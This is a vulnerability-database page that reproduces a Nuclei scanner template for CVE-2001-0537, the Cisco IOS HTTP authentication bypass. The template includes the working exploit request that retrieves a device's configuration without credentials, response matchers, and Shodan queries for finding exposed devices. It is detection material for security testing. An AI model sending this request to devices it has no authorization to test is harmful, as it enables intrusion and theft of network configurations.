Lucene search
+L

Cisco IOS HTTP Configuration - Authentication Bypass

🗓️ 01 Aug 2026 10:03:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 163 Views

Cisco IOS HTTP Configuration allows authentication bypass, leading to unauthorized access to affected devices. Apply patch or upgrade

Related
Refs
Code
id: CVE-2001-0537

info:
  name: Cisco IOS HTTP Configuration - Authentication Bypass
  author: DhiyaneshDK
  severity: critical
  description: |
    HTTP server for Cisco IOS 11.3 to 12.2 allows attackers to bypass authentication and execute arbitrary commands, when local authorization is being used, by specifying a high access level in the URL.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to the affected device.
  remediation: |
    Apply the appropriate patch or upgrade to a fixed version of the Cisco IOS software.
  reference:
    - https://www.rapid7.com/db/modules/auxiliary/scanner/http/cisco_ios_auth_bypass/
    - https://nvd.nist.gov/vuln/detail/CVE-2001-0537
    - http://www.ciac.org/ciac/bulletins/l-106.shtml
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/6749
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C
    cvss-score: 9.3
    cve-id: CVE-2001-0537
    cwe-id: CWE-287
    epss-score: 0.6845
    epss-percentile: 0.99265
    cpe: cpe:2.3:o:cisco:ios:11.3:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cisco
    product: ios
    shodan-query:
      - product:"Cisco IOS http config" && 200
      - product:"cisco ios http config"
      - cpe:"cpe:2.3:o:cisco:ios"
  tags: cve,cve2001,cisco,ios,auth-bypass,vkev,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/level/16/exec/show/config/CR'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'service config'
          - 'Switch'
          - 'default-gateway'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100fac213c724a477c5c39d8f98a2f2bc1d2570448caf14b2670f3586196e0ce870022002946fc18682f32d79dffb9ad1273f96c65f47f2605f2ef5747565437110ff5b:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.6845
163